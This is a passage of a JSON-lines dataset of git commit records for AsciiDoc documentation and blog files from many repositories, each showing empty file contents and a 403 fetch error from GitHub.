2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30b326a28deeffc7f03b82d135a4e0e942e1608b","subject":"Update 2018-06-27-Running-cockpit-on-a-Satellite-Capsule-Foreman-Proxy.adoc","message":"Update 2018-06-27-Running-cockpit-on-a-Satellite-Capsule-Foreman-Proxy.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-06-27-Running-cockpit-on-a-Satellite-Capsule-Foreman-Proxy.adoc","new_file":"_posts\/2018-06-27-Running-cockpit-on-a-Satellite-Capsule-Foreman-Proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0a8177e7b2dd4e949afc8544db63aba2c0d65d7","subject":"Create README.adoc","message":"Create README.adoc","repos":"lefou\/LambdaTest,lefou\/LambdaTest,lefou\/poor-mans-lambda-test,lefou\/poor-mans-lambda-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/poor-mans-lambda-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"196db4e795a88a40ab4b237708c7b6802e01d813","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"991fbe07e1a47a182023cd9522016775c67a6e0d","subject":"app.asciidoc: Document how to handle generated source files","message":"app.asciidoc: Document how to handle generated source files\n","repos":"rabbitmq\/erlang.mk,nevar\/erlang.mk,jj1bdx\/erlang.mk,KrzysiekJ\/erlang.mk,bsmr-erlang\/erlang.mk,a12n\/erlang.mk,hairyhum\/erlang.mk,ninenines\/erlang.mk,ingwinlu\/erlang.mk,crownedgrouse\/erlang.mk","old_file":"doc\/src\/guide\/app.asciidoc","new_file":"doc\/src\/guide\/app.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crownedgrouse\/erlang.mk.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"298360cf02a7d744ee170858eda45d8391c7efa1","subject":"Create main.adoc","message":"Create main.adoc","repos":"jauco\/asciidoctorbug","old_file":"main.adoc","new_file":"main.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jauco\/asciidoctorbug.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f349828f6db6abeaa0822a00a588b43eae898c80","subject":"Update 2017-05-30-Test.adoc","message":"Update 2017-05-30-Test.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-30-Test.adoc","new_file":"_posts\/2017-05-30-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b50813f881cac2f6b1051a9112e249b34f81500","subject":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","message":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d72a8f8026b606ebd9793932bbc679c5feb59d93","subject":"[DOCS] Add ML geographic functions (elastic\/x-pack-elasticsearch#1357)","message":"[DOCS] Add ML geographic functions (elastic\/x-pack-elasticsearch#1357)\n\n* [DOCS] Add ML geographic functions\r\n\r\n* [DOCS] Add script_fields info to ML geo functions\r\n\r\n* [DOCS] Remove summary count from ML geographic functions\r\n\r\n* [DOCS] Added example title to geographic functions\r\n\r\n* [DOCS] Remove list from ML geographic functions\r\n\nOriginal commit: elastic\/x-pack-elasticsearch@a8e495657fbbe794434f6baa572e3777707d6b58\n","repos":"uschindler\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/en\/ml\/functions\/geo.asciidoc","new_file":"docs\/en\/ml\/functions\/geo.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef2f6fffc99343cdf3b4445bc94834d6090fc061","subject":"y2b create post If You're Seeing This It's Too Late...","message":"y2b create post If You're Seeing This It's Too Late...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-28-If-Youre-Seeing-This-Its-Too-Late.adoc","new_file":"_posts\/2017-07-28-If-Youre-Seeing-This-Its-Too-Late.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9a5de7ce9dc351f79717e42d71197f37f508f6c","subject":"Update 2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","message":"Update 2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-09-Brewers-C-A-P-Theorem-and-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"674e63c7210aee2291b89853eb6bd5955ba7516a","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b53b22b15f983551c4db20dcae17ec889ee1655","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d44f12fd0995846c2353abd7ff989182d3a5056","subject":"Update 2017-03-09-Actuacion-en-La-Alberca-el-29-de-abril.adoc","message":"Update 2017-03-09-Actuacion-en-La-Alberca-el-29-de-abril.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2017-03-09-Actuacion-en-La-Alberca-el-29-de-abril.adoc","new_file":"_posts\/2017-03-09-Actuacion-en-La-Alberca-el-29-de-abril.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51776a11ffc1e1d4c0ab8cdd40732f03bdfe4d39","subject":"y2b create post These Fidget Things Have Gone Too Far...","message":"y2b create post These Fidget Things Have Gone Too Far...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-17-These-Fidget-Things-Have-Gone-Too-Far.adoc","new_file":"_posts\/2017-06-17-These-Fidget-Things-Have-Gone-Too-Far.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25511c00ed501151a4b78f211e0fcf3b4c03fd46","subject":"y2b create post They Say It's The Fastest In The World...","message":"y2b create post They Say It's The Fastest In The World...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-11-They-Say-Its-The-Fastest-In-The-World.adoc","new_file":"_posts\/2017-10-11-They-Say-Its-The-Fastest-In-The-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35bed97780774015ed1fbe45cd83a654c5adbb08","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/showdown.asciidoc","new_file":"_brainstorms\/showdown.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ad18edc20fd175fa85f6ebdbd04e1ef550f653f","subject":"y2b create post Razer Mamba 2012 Elite Wireless Gaming Mouse Unboxing \\u0026 Overview","message":"y2b create post Razer Mamba 2012 Elite Wireless Gaming Mouse Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-07-15-Razer-Mamba-2012-Elite-Wireless-Gaming-Mouse-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2012-07-15-Razer-Mamba-2012-Elite-Wireless-Gaming-Mouse-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"939942eb158fec2f4a6dfa191adbdd3757accb9d","subject":"#243 add readme for forwading to documentation","message":"#243 add readme for forwading to documentation\n","repos":"ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli,ConSol\/sakuli","old_file":"docs\/README.adoc","new_file":"docs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ConSol\/sakuli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8bef624eaf1bb27ccad779d6bc224543945a0661","subject":"Update 2016-02-27-Disney-announces-price-increase-and-seasonal-pricing-on-1-day-tickets.adoc","message":"Update 2016-02-27-Disney-announces-price-increase-and-seasonal-pricing-on-1-day-tickets.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-27-Disney-announces-price-increase-and-seasonal-pricing-on-1-day-tickets.adoc","new_file":"_posts\/2016-02-27-Disney-announces-price-increase-and-seasonal-pricing-on-1-day-tickets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b3e1c51c9282118f9f70d0949f1a4e7795b1e80","subject":"Update 2015-02-18-Hello-World.adoc","message":"Update 2015-02-18-Hello-World.adoc","repos":"haxiomic\/haxiomic.github.io,haxiomic\/haxiomic.github.io,haxiomic\/haxiomic.github.io","old_file":"_posts\/2015-02-18-Hello-World.adoc","new_file":"_posts\/2015-02-18-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/haxiomic\/haxiomic.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d07927f11cdbd08ee341f99e6f365642efc7fe8e","subject":"Update 2016-01-18-md5-cracker.adoc","message":"Update 2016-01-18-md5-cracker.adoc","repos":"buchedan\/buchedan.github.io,buchedan\/buchedan.github.io,buchedan\/buchedan.github.io","old_file":"_posts\/2016-01-18-md5-cracker.adoc","new_file":"_posts\/2016-01-18-md5-cracker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/buchedan\/buchedan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d3fcc0befcc34007a3904fd3507dbc6b67c2fb8","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49f30cd7cfb1a472b64e470e6088c6a130768296","subject":"y2b create post Casio G-Shock GD-100-1BDR Unboxing \\u0026 Overview + Close Ups!","message":"y2b create post Casio G-Shock GD-100-1BDR Unboxing \\u0026 Overview + Close Ups!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-19-Casio-GShock-GD1001BDR-Unboxing-u0026-Overview--Close-Ups.adoc","new_file":"_posts\/2011-01-19-Casio-GShock-GD1001BDR-Unboxing-u0026-Overview--Close-Ups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40d383782b098dd56971a92d12f41f36fd5bebd4","subject":"EST-1571: adds some analysis notes","message":"EST-1571: adds some analysis notes\n","repos":"estatio\/estatio,estatio\/estatio,estatio\/estatio,estatio\/estatio","old_file":"adocs\/documentation\/src\/main\/asciidoc\/scenarios-linking-orders-and-invoices.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/scenarios-linking-orders-and-invoices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/estatio\/estatio.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a96f079062d11207cdd15868b6fc8a155b82ae56","subject":"[DOC] Add section on PySpark","message":"[DOC] Add section on PySpark\n","repos":"xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a01e8152dc968ec5d3bcd0e3da7ce4f85e70683","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aa57752bfffea07a089de33023712e16ccd0685","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d955fd5a9b534be669c1fa10571a55f82aaac00","subject":"Update 2015-05-06-Interview-after-Greach-2015-Conference.adoc","message":"Update 2015-05-06-Interview-after-Greach-2015-Conference.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-05-06-Interview-after-Greach-2015-Conference.adoc","new_file":"_posts\/2015-05-06-Interview-after-Greach-2015-Conference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b25a14da654085c10fe30601609595b15570d683","subject":"Replace wiki links with vaadin.github.io\/spring-tutorial","message":"Replace wiki links with vaadin.github.io\/spring-tutorial\n","repos":"mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,asashour\/framework","old_file":"documentation\/articles\/IBGettingStartedWithVaadinSpringWithoutSpringBoot.asciidoc","new_file":"documentation\/articles\/IBGettingStartedWithVaadinSpringWithoutSpringBoot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"105fd5c7853fac4f4b4c902abba77c63ad84371f","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26deb44162e439453ca621cd4fd9be57600f4254","subject":"Moved to new blender folder.","message":"Moved to new blender folder.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/blender\/blender_gltf.adoc","new_file":"src\/docs\/asciidoc\/blender\/blender_gltf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"7961e1750658ed8c2c3a7da8cf8885b2cc1fee32","subject":"Update 2015-09-23-Daisies-arent-roses.adoc","message":"Update 2015-09-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86938343c96bdbee9615a8c0abed1e015dbc74a8","subject":"Update 2016-04-15-Introduccion-a-Ruby.adoc","message":"Update 2016-04-15-Introduccion-a-Ruby.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82538427cf25a924ff090ff9be75c0dd5cb21eeb","subject":"IGNITE-13674 Add documentation for Native Persistence Defragmentation feature (#8465)","message":"IGNITE-13674 Add documentation for Native Persistence Defragmentation feature (#8465)\n\n","repos":"chandresh-pancholi\/ignite,NSAmelchev\/ignite,xtern\/ignite,chandresh-pancholi\/ignite,NSAmelchev\/ignite,xtern\/ignite,chandresh-pancholi\/ignite,chandresh-pancholi\/ignite,chandresh-pancholi\/ignite,NSAmelchev\/ignite,apache\/ignite,xtern\/ignite,apache\/ignite,ascherbakoff\/ignite,ascherbakoff\/ignite,NSAmelchev\/ignite,chandresh-pancholi\/ignite,chandresh-pancholi\/ignite,xtern\/ignite,chandresh-pancholi\/ignite,chandresh-pancholi\/ignite,ascherbakoff\/ignite,xtern\/ignite,ascherbakoff\/ignite,NSAmelchev\/ignite,ascherbakoff\/ignite,apache\/ignite,apache\/ignite,ascherbakoff\/ignite,NSAmelchev\/ignite,NSAmelchev\/ignite,NSAmelchev\/ignite,apache\/ignite,xtern\/ignite,NSAmelchev\/ignite,apache\/ignite,xtern\/ignite,ascherbakoff\/ignite,ascherbakoff\/ignite,xtern\/ignite,xtern\/ignite,ascherbakoff\/ignite,apache\/ignite,apache\/ignite,apache\/ignite","old_file":"docs\/_docs\/persistence\/native-persistence-defragmentation.adoc","new_file":"docs\/_docs\/persistence\/native-persistence-defragmentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtern\/ignite.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5babe05b51cf11bd448e5fba850e04a1f8841c9b","subject":"Update 2018-03-25-Improve-Tile-based-Light-Culling-with-Spherical-sliced-Cone.adoc","message":"Update 2018-03-25-Improve-Tile-based-Light-Culling-with-Spherical-sliced-Cone.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2018-03-25-Improve-Tile-based-Light-Culling-with-Spherical-sliced-Cone.adoc","new_file":"_posts\/2018-03-25-Improve-Tile-based-Light-Culling-with-Spherical-sliced-Cone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fb12e4f1a06a775a19f64a610a0203b710e8acf","subject":"Update 2016-05-28-Zero-effort-A-P-I-client.adoc","message":"Update 2016-05-28-Zero-effort-A-P-I-client.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-05-28-Zero-effort-A-P-I-client.adoc","new_file":"_posts\/2016-05-28-Zero-effort-A-P-I-client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70482e7a8f580c87b74f057dd251247de17e9b96","subject":"y2b create post A Drone's Worst Nightmare...","message":"y2b create post A Drone's Worst Nightmare...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-01-A-Drones-Worst-Nightmare.adoc","new_file":"_posts\/2017-02-01-A-Drones-Worst-Nightmare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0025724b5040e1c8355ebb4761489604b64fb32c","subject":"Update 2017-07-27-Acemice-Belki-Hadsizce-5.adoc","message":"Update 2017-07-27-Acemice-Belki-Hadsizce-5.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-07-27-Acemice-Belki-Hadsizce-5.adoc","new_file":"_posts\/2017-07-27-Acemice-Belki-Hadsizce-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ae84861596d905c484c5a737887928ecd98ee5a","subject":"Python - Generting cookie secret for web framework","message":"Python - Generting cookie secret for web framework\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} 